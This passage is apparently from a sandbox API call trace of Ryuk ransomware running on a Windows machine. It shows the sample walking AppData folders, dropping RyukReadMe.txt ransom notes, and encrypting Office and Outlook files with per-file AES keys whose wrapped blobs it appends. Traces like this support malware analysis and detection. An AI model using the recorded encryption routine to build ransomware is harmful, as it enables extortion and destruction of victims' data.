CloseHandle (hObject=0x190) returned 1 [0149.875] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.876] GetLastError () returned 0xb7 [0149.876] CloseHandle (hObject=0x190) returned 1 [0149.876] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.876] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.876] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.876] SetLastError (dwErrCode=0x0) [0149.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.876] GetLastError () returned 0x0 [0149.876] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0149.877] CloseHandle (hObject=0x194) returned 1 [0149.877] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0149.877] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.878] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.878] SetLastError (dwErrCode=0x0) [0149.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.878] GetLastError () returned 0x0 [0149.878] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0149.878] CloseHandle (hObject=0x198) returned 1 [0149.879] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0149.879] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.879] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.879] SetLastError (dwErrCode=0x0) [0149.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.879] GetLastError () returned 0x0 [0149.879] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.880] CloseHandle (hObject=0x19c) returned 1 [0149.880] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0149.880] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.880] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.880] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.880] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk", dwFileAttributes=0x80) returned 1 [0149.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0149.881] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=0) returned 1 [0149.881] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=0) returned 1 [0149.881] CloseHandle (hObject=0x1a0) returned 1 [0149.881] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.881] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0149.881] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0149.881] SetLastError (dwErrCode=0x0) [0149.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.881] GetLastError () returned 0x0 [0149.882] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.882] CloseHandle (hObject=0x19c) returned 1 [0149.883] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0149.883] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.883] GetLastError () returned 0xb7 [0149.883] CloseHandle (hObject=0x198) returned 1 [0149.883] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0149.883] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.883] GetLastError () returned 0xb7 [0149.883] CloseHandle (hObject=0x194) returned 1 [0149.883] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.883] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.883] SetLastError (dwErrCode=0x0) [0149.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.883] GetLastError () returned 0xb7 [0149.883] CloseHandle (hObject=0x190) returned 1 [0149.884] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.884] SetLastError (dwErrCode=0x0) [0149.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.884] GetLastError () returned 0xb7 [0149.884] CloseHandle (hObject=0x190) returned 1 [0149.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.886] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.886] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.886] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.886] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl", dwFileAttributes=0x80) returned 1 [0149.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.888] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=37762) returned 1 [0149.888] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=37762) returned 1 [0149.888] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x9260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.888] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0149.889] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.889] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0149.889] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.889] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.889] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9382, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x9382, lpOverlapped=0x0) returned 1 [0149.890] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0149.890] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x9382, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x9390) returned 1 [0149.890] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.890] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9390, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x9390, lpOverlapped=0x0) returned 1 [0149.891] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0149.891] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0149.891] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0149.891] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0149.891] CloseHandle (hObject=0x194) returned 1 [0149.907] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.911] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.911] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.911] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.911] SetLastError (dwErrCode=0x0) [0149.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.911] GetLastError () returned 0x0 [0149.911] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0149.912] CloseHandle (hObject=0x194) returned 1 [0149.912] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0149.913] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.913] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.913] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.913] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat", dwFileAttributes=0x80) returned 1 [0149.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.914] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=52) returned 1 [0149.914] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=52) returned 1 [0149.914] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0149.914] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.915] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.915] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x34, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x34, lpOverlapped=0x0) returned 1 [0149.915] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0149.915] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x34, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x40) returned 1 [0149.916] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.916] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x40, lpOverlapped=0x0) returned 1 [0149.916] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0149.916] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0149.916] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0149.916] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0149.916] CloseHandle (hObject=0x198) returned 1 [0149.935] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.939] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.939] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.939] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0149.939] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0149.939] SetLastError (dwErrCode=0x0) [0149.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.939] GetLastError () returned 0x0 [0149.939] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0149.940] CloseHandle (hObject=0x194) returned 1 [0149.943] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.943] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.943] SetLastError (dwErrCode=0x0) [0149.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.943] GetLastError () returned 0xb7 [0149.943] CloseHandle (hObject=0x190) returned 1 [0149.944] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.944] SetLastError (dwErrCode=0x0) [0149.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.944] GetLastError () returned 0xb7 [0149.944] CloseHandle (hObject=0x190) returned 1 [0149.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.945] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.945] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.945] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.945] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs", dwFileAttributes=0x80) returned 1 [0149.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.946] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=2560) returned 1 [0149.946] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=2560) returned 1 [0149.946] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x8de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0149.947] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.948] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0149.948] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.948] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.948] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xa00, lpOverlapped=0x0) returned 1 [0149.948] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0149.948] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xa00, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xa10) returned 1 [0149.948] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.948] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, 